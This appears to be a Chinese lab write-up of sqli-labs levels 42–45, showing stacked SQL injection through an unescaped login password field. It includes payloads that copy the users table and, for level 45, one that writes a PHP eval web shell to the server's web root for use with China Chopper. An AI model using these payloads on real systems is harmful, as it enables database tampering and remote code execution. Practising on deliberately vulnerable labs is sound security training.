zoukankan      html  css  js  c++  java
  • sqli-libs(42-45(post型)关)

    Less_42

    查看源代码,可以看到password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造

     

    使用admin 111111进行登录,登陆成功;

     

    我们打开查看元素,将type修改为text,则密码将显示出来;

     

     

     我们在名称那输入admin

     密码那输入

    a';create table ztt42 like users;insert into ztt42 select *from users; #

    回显错误;

     

     但我们查看后台数据库,显示表ztt42已建好,说明注入成功;

     

     

    Less_43

    Less43:  使用(‘’)包裹   他操作与42关基本一致。

    我们打开查看元素,将type修改为text,将密码将显示出来;

     

    其余操作与42关基本一致。

     

     

     

     

     

    Less_44/45

    less-44:    使用’’包裹  其他操作与第42基本一致

    less-45:   使用(‘’)包裹   其他操作与第42基本一致

      

    账户输入a  密码输入a   回显依旧错误,并且回显没有报错信息;

     

     其他操作与第42关基本一致。

     Less45使用使用堆叠注入写入一句话木马配合中国菜刀也可以进行注入

    需要条件:

    1.必须要有写权限

    2.一句话木马<?php @eval($_POST[crow]);?> 

    3.Select xxx into outfile xxx

    4.绝对路径(C:\phpStudyWWW

    最终结果 密码输入:  a’)  select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\phpStudy\WWW\a.php’;#

     

     

     

  • 相关阅读:
    JavaScript系列:JavaScript简介
    Fit自适应布局
    JavaScript数值类型及变量
    表格列Column
    JavaScript系列:ECMAScript引用类型
    Absolute绝对定位
    JavaScript系列:ECMAScript运算符
    JavaScript系列:ECMAScript类型转换
    jQuery Uploadify在ASP.NET MVC3中的使用
    JavaScript系列:ECMAScript语句
  • 原文地址:https://www.cnblogs.com/199904-04/p/12296572.html
Copyright © 2011-2022 走看看